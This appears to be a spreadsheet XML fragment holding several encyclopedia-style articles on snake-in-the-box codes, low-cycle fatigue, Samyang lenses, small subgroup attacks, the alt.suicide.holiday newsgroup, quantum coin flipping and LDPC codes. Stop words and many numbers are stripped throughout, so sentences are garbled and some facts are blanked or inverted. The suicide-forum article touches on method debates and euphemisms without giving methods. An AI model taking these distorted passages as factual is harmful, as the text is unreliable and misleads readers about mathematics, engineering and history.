    <t>snake-in-the-box problem graph theory computer science deals finding certain kind path along edges hypercube. this path starts corner travels along edges many corners reach. after gets corner, previous corner neighbors must marked unusable. path never travel corner marked unusable. words, snake connected open path hypercube node connected path, exception head (start) tail (finish), exactly neighbors also snake. head tail neighbor snake. rule generating snake node hypercube visited connected current node neighbor previously visited node snake, current node. graph theory terminology, called finding longest possible induced path hypercube; viewed special case induced subgraph isomorphism problem. there similar problem finding long induced cycles hypercubes, called coil-in-the-box problem. snake-in-the-box problem first described kautz (1958), motivated theory error-correcting codes. vertices solution snake coil problems used gray code detect single-bit errors. such codes applications electrical engineering, coding theory, computer network topologies. applications, important devise long code possible given dimension hypercube. longer code, effective capabilities. finding longest snake coil becomes notoriously difficult dimension number increases search space suffers serious combinatorial explosion. some techniques determining upper lower bounds snake-in-the-box problem include proofs using discrete mathematics graph theory, exhaustive search search space, heuristic search utilizing evolutionary techniques. known lengths bounds maximum length snake-in-the-box problem known dimensions eight; (sequence a099155 oeis).beyond length, exact length longest snake known; best lengths found dimensions nine thirteen 190, 370, 712, 1373, 2687.for cycles (the coil-in-the-box problem), cycle cannot exist hypercube dimension less two. maximum lengths longest possible cycles (sequence a000937 oeis).beyond length, exact length longest cycle known; best lengths found dimensions nine thirteen 188, 366, 692, 1344, 2594.doubled coils special case: cycles whose second half repeats structure first half, also known symmetric coils. dimensions seven lengths longest possible doubled coils 46.beyond that, best lengths found dimensions eight thirteen 186, 362, 662, 1222, 2354.for snake coil problems, known maximum length proportional n-dimensional box, asymptotically grows large, bounded however constant proportionality known, observed range current best known values. notes references abbot, katchalski, (1988), snake problem", journal combinatorial theory, series 13–24, doi:10.1016/0095-8956(88)90051-2 abbot, katchalski, (1991), construction snake-in-the-box codes", utilitas mathematica, 97–116 allison, david; paulusma, daniel (2016), bounds snake-in-the-box problem, arxiv:1603.05119, bibcode:2016arxiv160305119a bitterman, (2004), lower bounds snake-in-the-box problem: prolog genetic algorithm heuristic search approach (pdf) (m.s. thesis), department computer science, university georgia blaum, mario; etzion, tuvi (2002), snake-in-the-box codes reliable identification tracks servo fields disk drive, u.s. patent 6,496,312 casella, potter, (2005), "using evolutionary techniques hunt snakes coils", 2005 ieee congress evolutionary computation (cec2005), vol. 2499–2504 casella, (2005), lower bounds snake-in-the-box coil-in-the-box problems (pdf) (m.s. thesis), department computer science, university georgia danzer, klee, (1967), "length snakes boxes", journal combinatorial theory, (3): 258–265, doi:10.1016/s0021-9800(67)80026-7 davies, (1965), "longest 'separated' paths loops n-cube", ieee transactions electronic computers, ec-14 (2): 261, doi:10.1109/pgec.1965.264259 deimer, knut (1985), upper bound length snakes", combinatorica, (2): 109–120, doi:10.1007/bf02579373 diaz-gomez, hougen, (2006), "the snake problem: mathematical conjecture genetic algorithm approach", proceedings conference genetic evolutionary computation, seattle, washington, usa, 1409–1410, doi:10.1145/1143997.1144219 douglas, robert (1969), "upper bounds length circuits even spread d-cube", journal combinatorial theory, (3): 206–214, doi:10.1016/s0021-9800(69)80013-x evdokimov, (1969), "maximal length chain unit n-dimensional cube", matematicheskie zametki, 309–319 kautz, william (june 1958), "unit-distance error-checking codes", transactions electronic computers, ec-7 (2): 179–180, doi:10.1109/tec.1958.5222529, s2cid 26649532 kim, neuhoff, (2000), "snake-in-the-box codes robust quantizer index assignments", proceedings ieee international symposium information theory, 402, doi:10.1109/isit.2000.866700 kinny, (2012), approach snake-in-the-box problem", proceedings 20th european conference artificial intelligence, ecai-2012, 462–467 kinny, (2012), "monte-carlo search snakes coils", proceedings international multi-disciplinary trends artificial intelligence, miwai-2012, 271–283 klee, (1970), "what maximum length d-dimensional snake?", american mathematical monthly, (1): 63–65, doi:10.2307/2316860, jstor 2316860 kochut, (1996), "snake-in-the-box codes dimension journal combinatorial mathematics combinatorial computing, 175–185 lukito, zanten, (2001), non-asymptotic upper bound snake-in-the-box codes", journal combinatorial mathematics combinatorial computing, 147–156 paterson, kenneth tuliani, jonathan (1998), "some circuit codes", ieee transactions information theory, (3): 1305–1309, doi:10.1109/18.669420 potter, robinson, miller, kochut, redys, (1994), "using genetic algorithm find snake codes", proceedings seventh international conference industrial engineering applications artificial intelligence expert systems, austin, texas, usa, 421–426 snevily, (1994), "the snake-in-the-box problem: upper bound", discrete mathematics, (1–3): 307–314, doi:10.1016/0012-365x(94)90039-6 solov'eva, (1987), upper bound length cycle n-dimensional unit cube", metody diskretnogo analiza russian), 71–76, 96–97 tuohy, potter, casella, (2007), "searching snake-in-the-box codes evolved pruning models", proceedings 2007 int. conf. genetic evolutionary methods (gem'2007), vegas, nevada, usa, wojciechowski, (1989), lower bound snake-in-the-box codes", combinatorica, (1): 91–99, doi:10.1007/bf02122688 yang, yuan sheng; sun, fang; han, song (2000), backward search algorithm snake problem", journal dalian university technology, (5): 509–511 zémor, gilles (1997), upper bound size snake-in-the-box", combinatorica, (2): 287–298, doi:10.1007/bf01200911 zinovik, kroening, chebiryak, (2008), "computing binary combinatorial gray codes exhaustive search solvers", ieee transactions information theory, (4): 1819–1823, doi:10.1109/tit.2008.917695, hdl:20.500.11850/11304 external links kinny, david (2012), snake-in-the-box research page (kyoto university) potter, (2011), list current records snake-in-the-box problem (uga) weisstein, eric "snake", mathworld</t>
  </si>
  <si>
    <t>Low-cycle fatigue</t>
  </si>
  <si>
    <t>cycle fatigue fundamental characteristics: plastic deformation cycle; cycle phenomenon, materials finite endurance type load. term cycle refers repeated applications stress lead eventual fatigue failure; low-cycle pertains long period applications. study fatigue focusing mainly fields: size design aeronautics energy production using advanced calculation methods. result allows study behavior material greater depth better understand complex mechanical metallurgical phenomena (crack propagation, work softening, strain concentration, work hardening, etc.). history common factors attributed low-cycle fatigue (lcf) high stress levels number cycles failure. many studies carried out, particularly last years metals relationship temperature, stress, number cycles failure. tests used plot curve, shown number cycles failure decreased increasing temperature. however, extensive testing would costly researchers mainly resorted using finite element analysis using computer software. through many experiments, found characteristics material change result lcf. fracture ductility tends decrease, magnitude depending presence small cracks begin with. perform tests, electro-hydraulic servo-controlled testing machine generally used, capable changing stress amplitude. also discovered performing low-cycle fatigue tests specimens holes already drilled susceptible crack propagation, hence greater decrease fracture ductility. this true despite small hole sizes, ranging characteristics when component subject cycle fatigue, repeatedly plastically deformed. example, part loaded tension permanently deformed (plastically deformed), would considered half cycle cycle fatigue, lcf. order complete full cycle part would need deformed back original shape. number cycles part withstand failing much lower regular fatigue.this condition high cyclic strain often result extreme operating conditions, high changes temperature. thermal stresses originating expansion contraction materials exacerbate loading conditions part characteristics come play. mechanics commonly used equation describes behavior low-cycle fatigue coffin-manson relation (published coffin 1954 manson 1953): {\displaystyle {\frac {\delta \varepsilon _{p}}{2}}=\varepsilon _{f}'(2n)^{c}+{\frac {\varsigma _{f}'(2n)^{b}}{e}}} where, plastic strain amplitude; empirical constant known fatigue ductility coefficient defined strain intercept number reversals failure cycles); empirical constant known fatigue ductility exponent, commonly ranging -0.5 -0.7. small results long fatigue life. empirical constant known fatigue brittleness exponent.the first half equation indicates plastic region second half equation indicates elastic region. notable failures noteworthy event failure result 1994 northridge earthquake. many buildings bridges collapsed, result 9,000 people injured. researchers university southern california analyzed main areas ten-story building subjected low-cycle fatigue. unfortunately, limited experimental data available directly construct curve low-cycle fatigue, analysis consisted plotting high-cycle fatigue behavior curve extending line graph create portion low-cycle fatigue curve using palmgren-miner method. ultimately, data used accurately predict analyze similar types damage ten-story steel building northridge faced. another recent event 2010 chile earthquake, several researchers university chile made reports multiple reinforced concrete structures damaged throughout country seismic event. many structural elements beams, walls columns failed fatigue, exposing steel reinforcements used design clear signs longitudinal buckling. this event caused chilean seismic design standards updated based observations damaged structures caused earthquake. references</t>
  </si>
  <si>
    <t>Samyang Optics</t>
  </si>
  <si>
    <t>samyang optics south korean manufacturer camera lenses several major brands third-party mounts still photography video cameras. company founded 1972 employees. samyang exports countries overseas agents distributors. samyang products also sold wide variety different brand names. some examples rokinon, bower, opteka, vivitar, phoenix quantaray. products autofocus lenses autofocus lenses:for canon mount: f/2.8 f/1.4 canon mount: f/2.8 f/1.4 rffor sony e-mount: f/2.8 f/2.8 f/2.8 f/1.4 f/1.8 f/2.8 f/1.8 f/1.4 f/1.4 24-70mm f/2.8 fefor nikon mount: f/2.8 f/1.4 manual focus lenses interchangeable manual focus lenses different mounts. f/1.4 f/2.8 f/1.8 f/2.8 fish-eye f/2.8 f/1.8 f/1.4 f/3.5 f/1.4 f/1.4 f/1.4 f/2.8 f/2.8 macro f/2.0 f/3.5 fish-eye f/2.0 f/3.5 fish-eye f/2.8 fish-eye f/2.0 f/1.4 f/1.2 f/1.2 f/6.3 dslrs premium lenses dslrs. f/3.5 f/2.4 f/1.2 f/1.2 f/1.2 cinema lenses interchangeable cinema lenses. t3.1 t3.1 t2.6 t1.9 t1.5 t1.5 t1.5 t1.5 t3.1 t2.2 t3.8 t3.1 t2.2 t3.8 t3.1 t2.2 t1.5 t1.3 t1.3 xeen cinema lenses cinema lenses sold xeen brand. xeen t3.1 xeen t2.6 xeen t1.9 xeen t1.5 xeen t1.5 xeen t1.5 xeen t1.5 xeen t2.2 discontinued products autofocus zoom lenses minolta/sony a-mount, nikon pentax kaf: 28-70 f/3.5-4.5 28-200 f/4-5.6 35-70 f/3.5-4.5 35-135 f/3.5 70-210 f/4-5.6 manual focus prime lenses manual focus prime t-mount mirror lenses. samyang f/6.3 reflex samyang f/5.6 samyang f/5.6 samyang f/5.6 samyang f/6.3 samyang f//8 samyang samyang preset samyang zoom samyang 650-1300 f/8-16 awards 2014 asia awards t1.5 2015 good design xeen 2016 e-photozine 'gear year' 2016 good design 2017 design awards 2018 reddot design award{what?}} 2018 tipa awards prime lens f/2.8 notes external links official website</t>
  </si>
  <si>
    <t>Small subgroup confinement attack</t>
  </si>
  <si>
    <t>cryptography, subgroup confinement attack, small subgroup confinement attack, cryptographic method operates large finite group attacker attempts compromise method forcing confined unexpectedly small subgroup desired group. several methods found vulnerable subgroup confinement attack, including forms applications diffie–hellman exchange dh-eke. references oorschot, wiener. (may 1996). diffie–hellman agreement short exponents". proceedings 15th annual international conference theory application cryptographic techniques. eurocrypt. saragossa, spain: springer-verlag. 332–343. isbn 3-540-61186-x. jablon (october 1996). "strong password-only authenticated exchange". computer communication review, sigcomm. (5): 5–26. doi:10.1145/242896.242897. c.h. p.j. lee. (1998). recovery attack discrete log-based schemes using prime order subgroup". proceedings 17th annual international cryptology conference advances cryptology. crypto. springer-verlag. 249–263. isbn 3-540-63384-7.</t>
  </si>
  <si>
    <t>Alt.suicide.holiday</t>
  </si>
  <si>
    <t>alt.suicide.holiday (a.s.h, ash) usenet newsgroup. original purpose discuss relationship suicide rates holiday seasons. however, since evolved broad discussion forum suicidal people openly share thoughts. some participants suicidal, post provide psychological support input suicidal depressed posters. newsgroup unmoderated subject high level trolling harsh sometimes hostile atmosphere. according faq, purpose neither encourage discourage suicide, maintaining stance pro-choice rather pro-suicide. "living suicidal, defense ash" explains ideologies debate ash's 'voluntary life' concept. since 2019, website longer publicly accessible. effects research 2007 shows suicide websites indeed could efficient providing emotional help people contemplating suicide suicide hotlines. primary reasons asynchronous nature discussion newsgroups giving enough time thoughtful response group-based discussion suicidal people find reassuring. high degree anonymity another advantage newsgroups like a.s.h, allowing people openly talk feelings without fear consequences. byron review 2008, analyzing effects websites children, says "research looking pro-suicide sites mixed results. some studies report high degrees emotional social support sites, particularly sites methods suicide discussed. more studies like needed begin understand impact sites spontaneously choose access them." point view often expressed a.s.h existence a.s.h actually prevented many deaths allowing people considering suicide connect others feelings giving place hide true feelings. suicide information a.s.h censor information suicide methods prohibit discussion. opponents discussion suicide methods potentially endangering vulnerable people people would otherwise live crisis, might commit suicide given information lethal methods. supporters open discussion state methods information widely legally available; information might prevent number permanent injuries resulting lack knowledge methods, like paracetamol overdoses. finally, indication making information available changed suicide rates. example, 1991 final exit published; first book giving how-to advice certain suicide methods. book number bestselling nonfiction book america weeks, sold million copies. time, remarkable increase suicide rates. coverage news newsgroup target news reports alleging direct relationship "avoidable" suicides suicide-facilitating nature newsgroup site. 2003, a.s.h topic series wired articles pretext examining group's role deaths several depressed individuals. accuracy integrity articles widely disputed ashers internet media critics, e.g., hagler's radio weblog: asked wanted die. a.s.h played role death suzy gonzales, killed 2003 sharing thoughts a.s.h. death suzy gonzales attempt introduce controversial h.r. 940: suzanne gonzales suicide prevention 2007, pass. current version bill 1183: suzanne gonzales suicide prevention 2011. community received media attention case william francis melchert-dinkel, charged encouraging suicides person britain 2005 another person canada 2008 a.s.h. coverage media a.s.h world wide suicide (2002) (tv), documentary a.s.h norway.today theatrical drama inspired true story. young norwegian young austrian girl agreed suicide pact a.s.h, jumped death prekestolen (pulpit rock). their tent, beer, stereo eventually found there. wired magazine reported original story. norway.today played performance germany years 2003 2004, translated languages played theaters. 2004, order: special victims unit aired episode called "painless", revolved around website similar philosophy called "catchingthetrain.com". terminology ticket refers tools preparations collected readied complete suicide, i.e., ticket "bus". catch commonly shorted "ctb", euphemism suicide. also seasonal effects suicide rates social media suicide suicide suicide methods references external links archive related material, ashspace another archive discussion group, 2002</t>
  </si>
  <si>
    <t>Quantum coin flipping</t>
  </si>
  <si>
    <t>consider remote players, connected channel, trust other. problem agreeing random exchanging messages channel, without relying trusted third party, called coin flipping problem cryptography. quantum coin flipping uses principles quantum mechanics encrypt messages secure communication. cryptographic primitive used construct complex useful cryptographic protocols, e.g. quantum byzantine agreement. unlike types quantum cryptography particular, quantum distribution), quantum coin flipping protocol used users trust other. consequently, users players) want coin toss attempt cheat various ways.it known communication players classical channel, i.e. channel quantum information cannot communicated, player principle) always cheat regardless protocol used. principle might cheating requires unfeasible amount computational resource. under standard computational assumptions, coin flipping achieved classical communication. basic figure merit coin-flipping protocol given bias, number {\displaystyle {\displaystyle 1/2} bias protocol captures success probability all-powerful cheating player uses best conceivable strategy. protocol bias {\displaystyle means player cheat. protocol bias {\displaystyle 1/2} means least player always succeed cheating. obviously, smaller bias better protocol. when communication quantum channel, shown even best conceivable protocol bias less 0.2071 {\displaystyle 1/{\sqrt {2}}-1/2\approx 0.2071} .consider case player knows preferred other. coin flipping problem makes additional assumption constitutes weaker variant thereof called weak coin flipping (wcf). case classical channels extra assumption yields improvement. hand, proven protocols arbitrarily small biases exist. however, best known explicit protocol bias 0.1667 {\displaystyle 1/6\approx 0.1667} .although quantum coin flipping offers clear advantages classical counterpart theory, accomplishing practice proven difficult. history theory manuel blum introduced coin flipping part classical system 1983 based computational algorithms assumptions. blum's version coin flipping answers following cryptographic problem: alice recently divorced, living separate cities, want decide gets keep car. decide, alice wants flip coin telephone. however, concerned tell alice heads, would flip coin automatically tell lost.thus, problem alice trust other; resource telephone communication channel, third party available read coin. therefore, alice must either truthful agree value convinced cheating.in 1984, quantum cryptography emerged paper written charles bennett giles brassard. paper, introduced idea using quantum mechanics enhance previous cryptographic protocols coin flipping. since then, many researchers applied quantum mechanics cryptography proven theoretically secure classical cryptography, however, demonstrating protocols practical systems difficult accomplish. experiment published 2014, group scientists laboratory communication processing information (ltci) paris implemented quantum coin flipping protocols experimentally. researchers reported protocol performs better classical system suitable distance metropolitan area optical network. definition coin flipping cryptography, coin flipping defined problem mutually distrustful remote players want agree random without relying third party. strong coin flipping (scf) quantum cryptography, strong coin flipping defined coin flipping problem player oblivious preference other. weak coin flipping (wcf) quantum cryptography, weak coin flipping defined coin flipping problem player knows preference other.it follows players opposite preferences. case problem pointless players simply choose outcome desire. bias consider coin flipping protocol. alice players wish implement protocol. consider scenario alice cheats using best strategy honestly follows protocol. probability obtains outcome alice preferred given {\displaystyle p_{a}^{*}} consider reversed situation, i.e. cheats using best strategy alice honestly follows protocol. corresponding probability alice obtains outcome preferred given {\displaystyle p_{b}^{*}} bias protocol defined {\textstyle \epsilon :=\max[p_{a}^{*},p_{b}^{*}]-{\frac {1}{2}}} half subtracted player desired value half time purely chance. extensions coin flipping defined biased coins well, i.e. bits equally likely. notion correctness also formalized requires players follow protocol (nobody cheats) players always agree generated follows fixed probability distribution. protocols using conjugate encoding quantum coin flipping types quantum cryptography communicate information transmission qubits. accepting player know information qubit performs measurement. information qubit stored carried single photon. once receiving player measures photon, altered, produce output measured again. since photon read once, party attempting intercept message easily detectable. quantum coin flipping random qubits generated players trust want coin toss, could lead cheat variety ways. essence coin flipping occurs players issue sequence instructions communication channel eventually results output.a basic quantum coin flipping protocol involves people: alice bob. alice sends number photon pulses quantum states {\displaystyle |\phi _{\alpha _{i}c_{i}}\rangle each photon pulses independently prepared following random choice alice basis 3...κ. measures pulses alice identifying random basis records photons reports back first successfully measured photon alice along random alice reveals basis used basis gave her. bases bits match, parties truthful exchange information. reported different alice's, truthful. general explanation protocol follows: alice first chooses random basis (such diagonally) sequence random qubits. alice encodes chosen qubits sequence photons following chosen basis. sends qubits train polarized photons communication channel. chooses sequence reading bases randomly individual photon. reads photons records results tables. table rectilinear (horizontal vertical) received photons diagonally received photons. holes tables losses detectors transmission channels. based table, makes guess basis alice used announces guess alice. guessed correctly, wins not, loses. alice reports whether announcing basis used bob. alice confirms information sending entire original qubit sequence used step compares alice's sequence tables confirm cheating occurred alice's part. tables correspond alice's basis correlation table. assumptions there assumptions must made protocol work properly. first alice create state independent bob, equal probability. second, first successfully measures, basis random completely independent alice. last assumption, measures state, uniform probability measure state, state easier detected others. this last assumption especially important alice aware bob's inability measure certain states, could advantage. cheating issue coin flipping occurs distrustful parties. these parties communicating communication channel distance agree winner loser percent chance winning. however, since distrustful another, cheating likely occur. cheating occur number ways claiming lost message like result increasing average number photons contained pulses.for cheat, would able guess alice's basis probability greater order accomplish this, would able determine train photons randomly polarized basis train photons polarized another basis.alice, hand, could cheat couple different ways, careful could easily detect when sends correct guess alice, could convince photons actually polarized opposite bob's correct guess. alice could also send different original sequence actually used order beat bob. detecting third-party single photons used pass information player (qubits). protocol, information encoded single photons polarization directions degrees, non-orthogonal quantum states. when third party attempts read gain information transmission, alter photon's polarization random likely detected players match pattern exchanged legitimate users. boom protocol (weak coin flipping bias {\textstyle 1/6} boom (ddb) protocol quantum version following game. consider list numbers {\displaystyle {p_{i}}} players, alice bob, take turns "dip" "boom" probability {\displaystyle p_{i}} round {\displaystyle player says "boom" wins. obviously, cheating player simply "boom" rewards longer games. consider games terminate (large) {\displaystyle {\displaystyle {\displaystyle p_{i}=1} consider round {\displaystyle denote {\displaystyle p_{a}(i)} {\displaystyle p_{b}(i)} probability respectively, alice winning. {\displaystyle p_{u}(i)} probability game remains undecided. these numbers classical game described evaluated inductively. describe quantum version. {\displaystyle {\mathcal {a}},{\mathcal {b}}} three dimensional hilbert space spanned {\displaystyle |a\rangle ,|b\rangle ,|u\rangle {\displaystyle {\mathcal {m}}} dimensional hilbert space spanned boom {\displaystyle |{\text{dip}}\rangle ,|{\text{boom}}\rangle initialisation: alice holds {\displaystyle {\mathcal {a}}\otimes {\mathcal {m}}} registers initialises state {\displaystyle |u\rangle \otimes |{\text{dip}}\rangle holds register {\displaystyle {\mathcal {b}}} initialises state {\displaystyle |u\rangle iteration: {\displaystyle i=1} {\displaystyle following must performed. {\displaystyle (for alice) (for bob); even {\displaystyle y=a. implements operation boom {\displaystyle r_{i}:={\text{rot}}(|u\rangle \otimes |{\text{dip}}\rangle ,|x\rangle \otimes |{\text{boom}}\rangle ,p_{i})} sends message register implements operation boom {\displaystyle {\tilde {r}}_{i}:={\text{rot}}\left(|u\rangle \otimes |{\text{boom}}\rangle ,|x\rangle \otimes |{\text{dip}}\rangle ,{\frac {p_{i}p_{u}(i-1)}{p_{x}(i)}}\right)} measures message register computational basis. outcome boom aborts declares him/herself winner. measurement: alice measure local register {\displaystyle {\mathcal {a}}} {\displaystyle {\mathcal {b}}} respectively. outcome declare winner. outcome alice winner bob. remarks obtain balanced protocol must choose {\displaystyle p_{i}} {\displaystyle p_{a}(n)={\frac {1}{2}}=p_{b}(n)} players follow protocol, i.e. player cheats, outcome step never boom neither outcome step {\displaystyle |u\rangle bias analysis protocol uses duality. large {\displaystyle bias protocol made arbitrarily close {\displaystyle 1/6} optimal strong coin flipping shown using protocol arbitrarily small bias construct protocol bias arbitrarily close {\textstyle {\frac {1}{\sqrt {2}}}-{\frac {1}{2}}} known optimal. experimental implementation using conjugate encoding mentioned history section, scientists ltci paris experimentally carried quantum coin flipping protocol. previous protocols called single photon source entangled source secure. however, sources difficult quantum coin flipping implemented. instead, researchers ltci used effects quantum superposition rather single photon source, claim makes implementation easier standard photon sources available.the researchers used clavis2 platform developed idquantique protocol, needed modify clavis2 system order work coin flipping protocol. experimental setup used clavis2 system, involves two-way approach. light pulsed 1550 nanometres sent alice. alice uses phase modulator encrypt information. after encryption, uses faraday mirror reflect attenuate pulses chosen level sends back bob. using high quality single photon detectors, chooses measurement basis phase modulator detect pulses alice.they replaced detectors bob's side detection efficiencies previous detectors. when replaced detectors, able show quantum advantage channel kilometres (9.3 mi). couple challenges group faced reprogramming system photon source attenuation high performing system analyses identify losses errors system components. with corrections, scientists capable implementing coin flipping protocol introducing small honest abort probability, probability honest participants cannot obtain coin flip protocol, short communication distance. references</t>
  </si>
  <si>
    <t>Low-density parity-check code</t>
  </si>
  <si>
    <t>information theory, low-density parity-check (ldpc) code linear error correcting code, method transmitting message noisy transmission channel. ldpc constructed using sparse tanner graph (subclass bipartite graph). ldpc codes capacity-approaching codes, means practical constructions exist allow noise threshold close theoretical maximum (the shannon limit) symmetric memoryless channel. noise threshold defines upper bound channel noise, probability lost information made small desired. using iterative belief propagation techniques, ldpc codes decoded time linear block length. ldpc codes finding increasing applications requiring reliable highly efficient information transfer bandwidth-constrained return-channel-constrained links presence corrupting noise. implementation ldpc codes lagged behind codes, notably turbo codes. fundamental patent turbo codes expired august 2013.ldpc codes also known gallager codes, honor robert gallager, developed ldpc concept doctoral dissertation massachusetts institute technology 1960. ldpc codes also shown ideal combinatorial properties. dissertation, gallager showed ldpc codes achieve gilbert–varshamov bound linear codes binary fields high probability. 2020 shown gallager's ldpc codes achieve list decoding capacity also achieve gilbert–varshamov bound linear codes general fields. history impractical implement first developed gallager 1963, ldpc codes forgotten work rediscovered 1996. turbo codes, another class capacity-approaching codes discovered 1993, became coding scheme choice late 1990s, used applications deep space network satellite communications. however, advances low-density parity-check codes seen surpass turbo codes terms error floor performance higher code rate range, leaving turbo codes better suited lower code rates only. applications 2003, irregular repeat accumulate (ira) style ldpc code beat turbo codes become error-correcting code dvb-s2 standard digital television. dvb-s2 selection committee made decoder complexity estimates turbo code proposals using much less efficient serial decoder architecture rather parallel decoder architecture. this forced turbo code proposals frame sizes order half frame size ldpc proposals. 2008, ldpc beat convolutional turbo codes forward error correction (fec) system itu-t g.hn standard. g.hn chose ldpc codes turbo codes lower decoding complexity (especially operating data rates close gbit/s) proposed turbo codes exhibited significant error floor desired range operation.ldpc codes also used 10gbase-t ethernet, sends data gigabits second twisted-pair cables. 2009, ldpc codes also part wi-fi 802.11 standard optional part 802.11n 802.11ac, high throughput (ht) specification. ldpc mandatory part 802.11ax (wi-fi 6).some ofdm systems additional outer error correction fixes occasional errors (the "error floor") past ldpc correction inner code even error rates. example: reed-solomon code ldpc coded modulation (rs-lcm) uses reed-solomon outer code. dvb-s2, dvb-t2 dvb-c2 standards code outer code residual errors ldpc decoding.5g uses polar code control channels ldpc data channels.many (and later) ssds using ldpc codes. operational ldpc codes functionally defined sparse parity-check matrix. this sparse matrix often randomly generated, subject sparsity constraints—ldpc code construction discussed later. these codes first designed robert gallager 1960.below graph fragment example ldpc code using forney's factor graph notation. graph, variable nodes graph connected (n−k) constraint nodes bottom graph. this popular graphically representing ldpc code. bits valid message, placed graph, satisfy graphical constraints. specifically, lines connecting variable node (box sign) value, values connecting factor node (box sign) must sum, modulo two, zero words, must even number; must even number values). ignoring lines going picture, eight possible six-bit strings corresponding valid codewords: (i.e., 000000, 011001, 110010, 101011, 111100, 100101, 001110, 010111). this ldpc code fragment represents three-bit message encoded bits. redundancy used, here, increase chance recovering channel errors. this linear code, again ignoring lines going picture, parity-check matrix representing graph fragment {\displaystyle \mathbf ={\begin{pmatrix}1&amp;1&amp;1&amp;1&amp;0&amp;0\\0&amp;0&amp;1&amp;1&amp;0&amp;1\\1&amp;0&amp;0&amp;1&amp;1&amp;0\\\end{pmatrix}}.} matrix, represents three parity-check constraints, column represents bits received codeword. example, eight codewords obtained putting parity-check matrix form {\displaystyle {\begin{bmatrix}-p^{t}|i_{n-k}\end{bmatrix}}} basic operations gf(2): {\displaystyle \mathbf ={\begin{pmatrix}1&amp;1&amp;1&amp;1&amp;0&amp;0\\0&amp;0&amp;1&amp;1&amp;0&amp;1\\1&amp;0&amp;0&amp;1&amp;1&amp;0\\\end{pmatrix}}_{1}\sim {\begin{pmatrix}1&amp;1&amp;1&amp;1&amp;0&amp;0\\0&amp;0&amp;1&amp;1&amp;0&amp;1\\0&amp;1&amp;1&amp;0&amp;1&amp;0\\\end{pmatrix}}_{2}\sim {\begin{pmatrix}1&amp;1&amp;1&amp;1&amp;0&amp;0\\0&amp;1&amp;1&amp;0&amp;1&amp;0\\0&amp;0&amp;1&amp;1&amp;0&amp;1\\\end{pmatrix}}_{3}\sim {\begin{pmatrix}1&amp;1&amp;1&amp;1&amp;0&amp;0\\0&amp;1&amp;1&amp;0&amp;1&amp;0\\1&amp;1&amp;0&amp;0&amp;0&amp;1\\\end{pmatrix}}_{4}.} step step added step swapped. step added from this, generator matrix obtained {\displaystyle {\begin{bmatrix}i_{k}|p\end{bmatrix}}} (noting special case binary code {\displaystyle p=-p} specifically: {\displaystyle \mathbf ={\begin{pmatrix}1&amp;0&amp;0&amp;1&amp;0&amp;1\\0&amp;1&amp;0&amp;1&amp;1&amp;1\\0&amp;0&amp;1&amp;1&amp;1&amp;0\\\end{pmatrix}}.} finally, multiplying eight possible 3-bit strings eight valid codewords obtained. example, codeword bit-string '101' obtained {\displaystyle {\begin{pmatrix}1&amp;0&amp;1\\\end{pmatrix}}\odot {\begin{pmatrix}1&amp;0&amp;0&amp;1&amp;0&amp;1\\0&amp;1&amp;0&amp;1&amp;1&amp;1\\0&amp;0&amp;1&amp;1&amp;1&amp;0\\\end{pmatrix}}={\begin{pmatrix}1&amp;0&amp;1&amp;0&amp;1&amp;1\\\end{pmatrix}}} ,where {\displaystyle \odot symbol multiplication. check, space orthogonal {\displaystyle g\odot h^{t}=0} bit-string '101' found first bits codeword '101011'. example encoder figure illustrates functional components ldpc encoders. during encoding frame, input data bits repeated distributed constituent encoders. constituent encoders typically accumulators accumulator used generate parity symbol. single copy original data (s0,k-1) transmitted parity bits make code symbols. bits constituent encoder discarded. parity used within another constituent code. example using dvb-s2 rate code encoded block size 64800 symbols (n=64800) 43200 data bits (k=43200) 21600 parity bits (m=21600). each constituent code (check node) encodes data bits except first parity encodes data bits. first 4680 data bits repeated times (used parity codes), remaining data bits used parity codes (irregular ldpc code). comparison, classic turbo codes typically constituent codes configured parallel, encodes entire input block data bits. these constituent encoders recursive convolutional codes (rsc) moderate depth states) separated code interleaver interleaves copy frame. ldpc code, contrast, uses many depth constituent codes (accumulators) parallel, encode small portion input frame. many constituent codes viewed many depth state) 'convolutional codes' connected repeat distribute operations. repeat distribute operations perform function interleaver turbo code. ability precisely manage connections various constituent codes level redundancy input give flexibility design ldpc codes, lead better performance turbo codes instances. turbo codes still seem perform better ldpcs code rates, least design well performing rate codes easier turbo codes. practical matter, hardware forms accumulators reused encoding process. that first parity bits generated parity bits stored, accumulator hardware used generate next parity bits. decoding codes, maximum likelihood decoding ldpc code binary symmetric channel np-complete problem. performing optimal decoding np-complete code useful size practical. however, sub-optimal techniques based iterative belief propagation decoding give excellent results practically implemented. sub-optimal decoding techniques view parity check makes ldpc independent single parity check (spc) code. each code decoded separately using soft-in-soft-out (siso) techniques sova, bcjr, map, derivates thereof. soft decision information siso decoding cross-checked updated redundant decodings information bit. each code decoded using updated soft decision information. this process iterated valid code word achieved decoding exhausted. this type decoding often referred sum-product decoding. decoding codes often referred "check node" processing, cross-checking variables often referred "variable-node" processing. practical ldpc decoder implementation, sets codes decoded parallel increase throughput. contrast, belief propagation binary erasure channel particularly simple consists iterative constraint satisfaction. example, consider valid codeword, 101011, example above, transmitted across binary erasure channel received first fourth erased yield ?01?11. since transmitted message must satisfied code constraints, message represented writing received message factor graph. example, first cannot recovered, constraints connected unknown bit. order proceed decoding message, constraints connecting erased bits must identified. example, second constraint suffices. examining second constraint, fourth must zero, since zero position would satisfy constraint. this procedure iterated. value fourth used conjunction first constraint recover first seen below. this means first must satisfy leftmost constraint. thus, message decoded iteratively. channel models, messages passed variable nodes check nodes real numbers, express probabilities likelihoods belief. this result validated multiplying corrected codeword parity-check matrix {\displaystyle \mathbf =\mathbf {h\odot ={\begin{pmatrix}1&amp;1&amp;1&amp;1&amp;0&amp;0\\0&amp;0&amp;1&amp;1&amp;0&amp;1\\1&amp;0&amp;0&amp;1&amp;1&amp;0\\\end{pmatrix}}\odot {\begin{pmatrix}1\\0\\1\\0\\1\\1\\\end{pmatrix}}={\begin{pmatrix}0\\0\\0\\\end{pmatrix}}.} because outcome (the syndrome) operation three zero vector, resulting codeword successfully validated. after decoding completed, original message bits '101' extracted looking first bits codeword. while illustrative, erasure example show soft-decision decoding soft-decision message passing, used virtually commercial ldpc decoders. updating node information recent years, also great deal work spent studying effects alternative schedules variable-node constraint-node update. original technique used decoding ldpc codes known flooding. this type update required that, updating variable node, constraint nodes needed updated vice versa. later work vila casado al., alternative update techniques studied, variable nodes updated newest available check-node information. intuition behind algorithms variable nodes whose values vary ones need updated first. highly reliable nodes, whose log-likelihood ratio (llr) magnitude large change significantly update next, require updates frequency nodes, whose sign magnitude fluctuate widely. these scheduling algorithms show greater speed convergence lower error floors flooding. these lower error floors achieved 